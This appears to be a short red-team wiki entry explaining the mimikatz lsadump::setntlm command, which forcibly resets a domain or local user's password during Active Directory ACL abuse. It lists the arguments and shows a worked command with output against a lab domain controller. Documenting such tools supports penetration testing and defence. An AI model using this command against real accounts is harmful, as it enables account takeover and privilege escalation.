setntlm
lsadump::setntlm can be used to perform a password reset without knowing the user's current password. It can be useful during an active directory Access Control (ACL) abuse scenario. It has the following command line arguments:
/ntlm: The new NT hash for the target user/user: The username of the account to target/password: The new password for the target user/server: hostname of the target server
Reset for a Domain User
mimikatz # lsadump::setntlm /user:optimus /password:VeryStrongPass1! /server:dc.hacklab.local
NTLM : 7cb0b13a4661116dd2c306fb2f4536b2
Target server: dc.hacklab.local
Target user : optimus
Domain name : hacklab
Domain SID : S-1-5-21-2725560159-1428537199-2260736313
User RID : 1732
>> Informations are in the target SAM!Reset for a Local User
Last updated